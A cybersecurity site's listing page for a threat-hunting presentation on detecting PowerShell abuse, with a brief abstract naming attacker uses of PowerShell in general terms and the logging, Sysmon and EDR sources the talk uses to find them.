Security through data

CONTENT

  • Home
  • Blog
  • Data
  • Directory
  • Events
  • Tutorials

FEATURED

  • CyberAlerts
  • CyberDecoded
  • CyberWeekly
  • CyberStory
  • CyberTips

COMPANY

  • About us
  • Advertise
  • Legal & Policy
Cybermaterial
  • CATEGORIES
    • Alerts
    • APIs
    • Apps
    • Blog
    • Cyber101
    • Documents
    • Entertainment
    • Learning
    • Quotes
    • Stats
    • Tools
No Result
View All Result
Contact Us
Newsletter
Cybermaterial
  • CATEGORIES
    • Alerts
    • APIs
    • Apps
    • Blog
    • Cyber101
    • Documents
    • Entertainment
    • Learning
    • Quotes
    • Stats
    • Tools
No Result
View All Result
Contact Us
Newsletter
Cybermaterial
No Result
View All Result

Hunting For PowerShell Abuse

BY Teymur Kheirkhabarov

in Documents, Papers
1 min read

PowerShell is the favorite tool of IT guys, who are responsible for administration of Windows infrastructures. It allows them to manage different services of the operating system and automate almost anything. But along with administrators, PowerShell also is liked by attackers and malware authors. The reason PowerShell is so attractive for adversaries is quite obvious: it has been included in essentially every Windows operating system by default for a decade, provides access to Windows API, and is rarely constrained, thus allowing adversaries to perform different tasks without risking being blocked. Attackers can use PowerShell to direct the execution of a local script, retrieve and execute remote resources using various network protocols, encode payloads passed via the command line, or load PowerShell into other processes.

Because of so prevalence of PowerShell among adversaries for Threat Hunters it is very important to be able to detect malicious uses of PowerShell and defend against it. In the presentation author is going to demonstrate an approaches for detection of PowerShell abuses based on different event sources like native Windows logging capabilities as well as usage of additional tools, like Sysmon or EDR solutions. How to collect traces of using PowerShell, how to filter out false positives, and how to find evidence of malicious uses among the remaining after filtering volume of events — all these questions will be answered in the talk for present and future threat hunters.

DOWNLOAD DOCUMENT

Tags: CybersecurityLinux
7
VIEWS

Related Reports

CYBER: Cyber Security for Consumer Internet of Things
Reports

CYBER: Cyber Security for Consumer Internet of Things

Blue Team Perspectives

AUSTRALIA’SCYBER SECURITYSTRATEGY 2020

MORE

HTML: Hyper-text markup language

Jobs

Cyber Jobs of the week – 2020.11.02

Quotes

“What’s different today vs. 2016, from a hacking perspective, is higher use of automated credential stuffing — to hijack accounts.”

Asset lifecycle

ADVERTISEMENT

Tags

Books Cyber Definition Cybersecurity Hackers Malware Memes Movies Quantum Computing Software Word of the day

© 2021 | CyberMaterial | All rights reserved.

SECURITY THROUGH DATA

No Result
View All Result
  • Home
  • Blog
  • Data
  • Directory
  • Events
  • Tutorials
  • CyberDecoded
  • Stats
  • CyberStory
  • CyberTips
  • Cyber Weekly

© 2020 CyberMaterial - Cyber Decoded.

This website uses cookies. By continuing to use this website you are giving consent to cookies being used. Visit our Privacy and Cookie Policy.